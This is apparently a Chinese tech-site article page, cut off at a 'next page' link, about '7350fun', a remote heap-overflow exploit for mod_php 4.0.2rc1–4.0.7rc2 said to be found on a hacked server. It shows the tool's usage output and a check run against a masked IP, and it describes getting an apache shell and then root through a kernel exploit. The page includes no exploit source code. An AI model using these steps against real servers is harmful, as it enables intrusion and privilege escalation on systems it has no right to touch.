从一台被黑的服务器上找到了如下工具fun此工具专门用来扫描PHP v4.0.2rc1-v4.0.7RC2的exploit程序。_程序员之家(找到PHP v4.0.2rc1-v4.0.7RC2 exploit program)

开发技术指南» 文章正文

引言：从一台被黑的服务器上找到了如下工具fun此工具专门用来扫描PHP v4.0.2rc1-v4.0.7RC2的exploit程序。

·引导问题 »显示摘要«

摘要：安装linux第一个碰到的问题是引导问题，因为是双操作系统。kernel version: fedora core 2 2.6.5-1.358boot software : grub===========================================================================可进 grub 控制台grub>其下可运行命令 grub>......

·mysql环境下的apache2054及php504的安装指南 »显示摘要«

摘要：mysql环境下的apache2054及php504的安装指南环境： redhat as4 说明：如果不做说明，一般安装命令均使用root权限，用 # 表示特别说明：本手册适用于已经安装好mysql的环境下，mysql的安装不在这里讨论，个人认为那个东西可以用rpm包安装或在安装新系统时（当然是最新的）直接安装。第一步：安装apache2054 下载apache2: http://httpd......

找到PHP v4.0.2rc1-v4.0.7RC2 exploit program

从一台被黑的服务器上找到了如下工具

此工具专门用来扫描php v4.0.2rc1-v4.0.7rc2的exploit程序.找到后通过堆溢出远程得到一个shell,得到root权限就更简单了.用法如下: 【程序编程相关:在Fedora的英文界面下使用中文】

fun 【推荐阅读:Linux程序应用开发环境和工具经验谈】

【扩展信息:软链接与硬链接的区别】

[root@linux_server tmp]# ./fun

7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7rc2 remote exploit

by lorian.

usage: ./fun [options]

options:

-c check exploitability only, do not exploit

-n no check mode

-s start bruteforce start (top)

-t target choose target

(1) php v4.0.2rc1-v4.0.5

(2) php v4.0.6-v4.0.7rc2

经过测试,可以获得一个apache权限的远程shell.然后通过内核溢出程序可以得到本地root了.经过测试redhat 7.2 服务器得到root权限.

方法如下:

[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php (验证服务器的php版本)

7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7rc2 remote exploit

by lorian.

+ checking for vulnerable php version...

... 下一页

·3322动态域名无法识别公网ip[转] »显示摘要«

摘要：3322动态域名无法识别公网ip[转]linuxsir 上mars_diy兄的方法:#!/bin/sh#请修改下面两个参数hostname="xxxx.3322.org"userpass="xxxx"#请修改下面两个命令的路径lynx="/usr/bin/lynx"updater="/usr/local/bin/ez-ipupd......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：